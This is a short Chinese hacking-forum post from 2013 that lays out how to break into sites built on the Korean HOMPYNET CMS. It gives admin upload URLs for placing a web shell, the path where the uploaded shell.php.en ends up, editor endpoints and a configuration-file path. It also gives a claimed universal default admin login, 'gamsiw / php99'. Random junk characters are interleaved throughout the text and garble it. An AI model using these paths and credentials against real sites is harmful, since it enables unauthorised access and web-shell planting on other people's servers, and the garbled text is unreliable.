找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2184|回复: 0
打印 上一主题 下一主题

韩国HOMPYNET CMS漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:12:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
上传漏洞  :- _7 B/ T3 n0 b; t6 s$ N! p& h

1 M2 \  [! q( O, s& s7 G& d0 hhttp://www.xxx.com/admin/image_a ... p;iname=&iform=
, ?  ?. X. ^' S7 M6 J& x- L$ t0 J( [1 \
http://www.xxx.com/admin/image_a ... p;iname=&iform=. v2 I7 Q7 q4 a0 F

$ |( W; W3 |$ W$ V8 l2 c上传后路径:
6 N4 N" A8 o- j# j. C+ x: n( l
/ z2 C, ?7 D( a8 khttp://www.xxx.com/bis_web_page/images/shell.php.en
8 {$ c- G1 J* ^6 t! ]7 ~! e) u+ W* R& x, d+ ?2 b
编辑器:( \+ T( L6 b# ~

' K& Z8 I1 C" k. u- n+ q' xhttp://www.xxx.com/admin/editor/SWE.php% I# u! w4 K6 z

- `6 G8 i# ^7 [8 {http://www.xxx.com/program/editor/SWE.php. n0 W( D) \" o- C  ~
7 J. M/ k1 ?$ H: j, F9 k
数据配置文件路径:& @7 P( k+ d- v8 g+ C4 X, ^
9 U4 ~4 j) _( s
http://www.xxx.com/m_config/DATA/g_setting.php0 N$ E$ T1 @; g, c

. u8 f) T( @. W/ ?; K: H1 H此程序通用后台账号 :gamsiw  php99! o5 K. d; G/ B" E3 t

/ d6 ]& V- `7 G6 [, |" w( `6 h$ T
2 P+ G( _. t/ F5 C2 O& Y1 X9 ~0 l1 |! _: `# h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表